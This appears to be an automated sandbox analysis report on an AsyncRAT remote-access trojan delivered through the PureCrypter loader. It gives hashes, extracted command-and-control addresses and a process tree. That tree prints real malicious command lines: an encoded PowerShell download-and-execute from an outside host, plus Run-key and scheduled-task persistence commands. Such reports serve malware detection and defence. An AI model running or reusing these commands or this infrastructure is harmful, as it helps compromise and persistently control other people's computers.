Analysis

  • max time kernel
    143s
  • max time network
    148s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    15-06-2024 10:59

General

  • Target

    0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe

  • Size

    501KB

  • MD5

    8b662719e44ab11419fe3e1d7e96cc03

  • SHA1

    af6c092ff304cd5131cc0295fa8b51a572af5388

  • SHA256

    0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

  • SHA512

    3a441802fad9b3eafe327d6239cb8891551df04ccf555658d8855fbbcdacda3abefc9e627b3a59cf28de9681e348d2cc749cd63514721c9b86e0519ceb57309a

  • SSDEEP

    12288:iSrH22qla5w/yXbxixFcRMFQIkeNCSo9mbX:iSrH0MW/IbxiYCQIkeNCSB

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

217.64.31.3:8808

217.64.31.3:8437

Mutex

Windows System Guard Runtime

Attributes
  • delay

    3

  • install

    false

  • install_file

    Windows Session Manager

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect PureCrypter injector 1 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe
    "C:\Users\Admin\AppData\Local\Temp\0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /nobreak /t 20
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2148
      • C:\Windows\SysWOW64\timeout.exe
        timeout /nobreak /t 20
        3⤵
        • Delays execution with timeout.exe
        PID:3620
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout 40
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1048
      • C:\Windows\SysWOW64\timeout.exe
        timeout 40
        3⤵
        • Delays execution with timeout.exe
        PID:1812
    • C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
      "C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4092
      • C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE
        "C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBiAGkAbgAyAC4AYQB3AHMALgBhAHQAcwBpAGcAbgAuAGMAbABvAHUAZAAvADkAMwBpADMAbwBuADEAZAAzAGYAdABhADgAaQBqAGgALwBkAGMAXwBjAHIAeQBwAHQALgBlAHgAZQAnACwAIAA8ACMAYgBxAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHkAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAG4AeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFMAZQBjAHUAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAaABjAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABuAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAaABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQA8ACMAaQBhAGsAIwA+AA=="
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3688
      • C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
        "C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3764
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'
          4⤵
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4856
        • C:\Windows\SysWOW64\cmd.exe
          "cmd" /C schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4120
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
            5⤵
            • Creates scheduled task(s)
            PID:3188
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          #cmd
          4⤵
            PID:3460
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        2⤵
          PID:2584

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        1e6e1eefe52266028bfa762c897b8e42

        SHA1

        04055d0d63018302918e1e1d4a0a2949f500f5d1

        SHA256

        356061c3465ca4897bb4848fc68ab931d2eca5b37a8f8180f709417ea992622a

        SHA512

        cf8cd23c2b4736792439e155f06b514cef1c91b87356e929b69679366fd2e9e5d8866904788dd738ca05ce6fe8eb8e341d1d8d637ff1dde81cfe50be3567b1e5

      • C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

        Filesize

        146KB

        MD5

        1a9c46f2b4420d156a82f160facf9376

        SHA1

        ce91faa7353cb4d3411b20a69350f27a6fe47990

        SHA256

        04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd

        SHA512

        14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olzpxvl4.u2c.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

        Filesize

        6KB

        MD5

        a0c1d68c150049944598f3927176a4b9

        SHA1

        bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1

        SHA256

        fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908

        SHA512

        c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

      • C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

        Filesize

        87KB

        MD5

        81230dd9258eebd0fe6a2cc681c43c51

        SHA1

        d6870e6014503e79589435d3b167f1c6e405721b

        SHA256

        9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1

        SHA512

        2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

      • memory/2256-5-0x0000000074B00000-0x00000000752B1000-memory.dmp

        Filesize

        7.7MB

      • memory/2256-6-0x00000000067A0000-0x0000000006814000-memory.dmp

        Filesize

        464KB

      • memory/2256-7-0x0000000006810000-0x000000000685C000-memory.dmp

        Filesize

        304KB

      • memory/2256-100-0x0000000074B00000-0x00000000752B1000-memory.dmp

        Filesize

        7.7MB

      • memory/2256-0-0x0000000074B0E000-0x0000000074B0F000-memory.dmp

        Filesize

        4KB

      • memory/2256-2-0x0000000005A10000-0x0000000005FB6000-memory.dmp

        Filesize

        5.6MB

      • memory/2256-8-0x0000000074B0E000-0x0000000074B0F000-memory.dmp

        Filesize

        4KB

      • memory/2256-4-0x00000000053E0000-0x00000000053EA000-memory.dmp

        Filesize

        40KB

      • memory/2256-9-0x0000000074B00000-0x00000000752B1000-memory.dmp

        Filesize

        7.7MB

      • memory/2256-3-0x0000000005460000-0x00000000054F2000-memory.dmp

        Filesize

        584KB

      • memory/2256-1-0x0000000000A00000-0x0000000000A82000-memory.dmp

        Filesize

        520KB

      • memory/2584-98-0x0000000000400000-0x000000000042E000-memory.dmp

        Filesize

        184KB

      • memory/3460-47-0x0000000000400000-0x0000000000412000-memory.dmp

        Filesize

        72KB

      • memory/3688-63-0x000002307DB20000-0x000002307DB42000-memory.dmp

        Filesize

        136KB

      • memory/3764-43-0x00000000008E0000-0x00000000008FC000-memory.dmp

        Filesize

        112KB

      • memory/4840-41-0x0000000000D00000-0x0000000000D08000-memory.dmp

        Filesize

        32KB

      • memory/4856-52-0x0000000005BD0000-0x0000000005C36000-memory.dmp

        Filesize

        408KB

      • memory/4856-88-0x00000000076A0000-0x00000000076AA000-memory.dmp

        Filesize

        40KB

      • memory/4856-53-0x0000000005DB0000-0x0000000005E16000-memory.dmp

        Filesize

        408KB

      • memory/4856-72-0x00000000062D0000-0x00000000062EE000-memory.dmp

        Filesize

        120KB

      • memory/4856-73-0x0000000006390000-0x00000000063DC000-memory.dmp

        Filesize

        304KB

      • memory/4856-74-0x00000000072C0000-0x00000000072F4000-memory.dmp

        Filesize

        208KB

      • memory/4856-75-0x000000006F670000-0x000000006F6BC000-memory.dmp

        Filesize

        304KB

      • memory/4856-84-0x0000000007280000-0x000000000729E000-memory.dmp

        Filesize

        120KB

      • memory/4856-85-0x0000000007500000-0x00000000075A4000-memory.dmp

        Filesize

        656KB

      • memory/4856-86-0x0000000007C60000-0x00000000082DA000-memory.dmp

        Filesize

        6.5MB

      • memory/4856-87-0x0000000007620000-0x000000000763A000-memory.dmp

        Filesize

        104KB

      • memory/4856-62-0x0000000005E20000-0x0000000006177000-memory.dmp

        Filesize

        3.3MB

      • memory/4856-89-0x00000000078B0000-0x0000000007946000-memory.dmp

        Filesize

        600KB

      • memory/4856-90-0x0000000007830000-0x0000000007841000-memory.dmp

        Filesize

        68KB

      • memory/4856-91-0x0000000007860000-0x000000000786E000-memory.dmp

        Filesize

        56KB

      • memory/4856-92-0x0000000007870000-0x0000000007885000-memory.dmp

        Filesize

        84KB

      • memory/4856-93-0x0000000007970000-0x000000000798A000-memory.dmp

        Filesize

        104KB

      • memory/4856-94-0x0000000007960000-0x0000000007968000-memory.dmp

        Filesize

        32KB

      • memory/4856-95-0x00000000079B0000-0x00000000079D2000-memory.dmp

        Filesize

        136KB

      • memory/4856-51-0x0000000005440000-0x0000000005462000-memory.dmp

        Filesize

        136KB

      • memory/4856-50-0x0000000005530000-0x0000000005B5A000-memory.dmp

        Filesize

        6.2MB

      • memory/4856-46-0x0000000002AF0000-0x0000000002B26000-memory.dmp

        Filesize

        216KB